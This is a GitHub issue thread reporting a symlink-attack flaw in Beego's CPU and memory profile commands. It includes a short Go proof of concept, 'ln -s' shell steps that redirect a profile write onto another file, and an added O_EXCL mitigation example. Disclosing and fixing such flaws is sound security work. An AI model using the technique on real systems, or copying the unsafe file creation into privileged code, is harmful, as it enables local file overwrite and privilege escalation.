get cpuprof and get memprof commands exist symlink-attacks vulnerability. #4484
Comments
From my understanding, if attackers could run
Exactly. Attackers can use this vulnerability to escalate privileges.
I am still confused. Attackers ran I mean why they don't do something more dangerous directly instead of running
What I mean is that in special scenarios, there are unauthorized attacks. The beego application runs under the root permission, and the written pprof file can be created by a low-privilege user using the symlink method, which may cause unauthorized rewriting.
Got it.
There are many similar cases in Beego. For example, the log files. So I think we don't need to do more things about it because if we want to enhance this, we should enhance all similar cases. More importantly, I think users should be responsible for ensuring that their servers are safe :(
Dear beego Team,
I would like to report a security vulnerability in Beego's admin module.
The vulnerable code is in the profile.go file: the MemProf and GetCPUProfile functions do not correctly check whether the created file exists. As a result, attackers can launch symlink attacks locally.
PoC code:
https://play.golang.org/p/TAvghgm_7fY
```go
package main

import (
	"fmt"
	"os"
)

func main() {
	// os.Create follows an existing symlink and truncates its target.
	file, err := os.Create("cpu-pid.pprof")
	if err != nil {
		fmt.Printf("Error creating file: %s", err)
		return
	}
	defer file.Close()
	_, err = file.Write([]byte("My logs for this process"))
	if err != nil {
		fmt.Println(err)
	}
}
```

```
$ ln -s other/logs cpu-pid.pprof
$ go build symlink_attack.go
$ ./symlink_attack
$ cat other/logs
$
```
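The behaviour reported above, next to an exclusive-create variant, as an added example that is not part of the original issue and is not Beego's code. The helper names `writeProfile` and `scenario` and the file `victim.conf` are assumptions made for illustration; the symlink is planted in a temporary directory.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// writeProfile writes data to path. With exclusive=true, O_EXCL makes the open
// fail with EEXIST if anything, including a symlink, already exists at path.
func writeProfile(path string, data []byte, exclusive bool) error {
	flags := os.O_RDWR | os.O_CREATE | os.O_TRUNC // same flags os.Create uses
	if exclusive {
		flags = os.O_WRONLY | os.O_CREATE | os.O_EXCL
	}
	f, err := os.OpenFile(path, flags, 0o600)
	if err != nil {
		return err
	}
	defer f.Close()
	_, err = f.Write(data)
	return err
}

// scenario plants a symlink at the profile path (constructed sample) and
// returns the victim file's content after one write attempt.
func scenario(exclusive bool) (string, error) {
	dir, err := os.MkdirTemp("", "pprof-demo")
	if err != nil {
		return "", err
	}
	defer os.RemoveAll(dir)
	target, link := filepath.Join(dir, "victim.conf"), filepath.Join(dir, "cpu-pid.pprof")
	if err := os.WriteFile(target, []byte("original"), 0o600); err != nil {
		return "", err
	}
	if err := os.Symlink(target, link); err != nil {
		return "", err
	}
	writeErr := writeProfile(link, []byte("profile data"), exclusive)
	b, _ := os.ReadFile(target)
	return string(b), writeErr
}

func main() {
	v, err := scenario(false)
	fmt.Printf("os.Create flags: victim=%q err=%v\n", v, err)
	v, err = scenario(true)
	fmt.Printf("O_EXCL:          victim=%q err=%v\n", v, err)
}
```

With `O_EXCL` the write is also refused when a stale profile from an earlier run is still at that path, so the caller has to handle that error, for example by writing into a directory only the service account can modify.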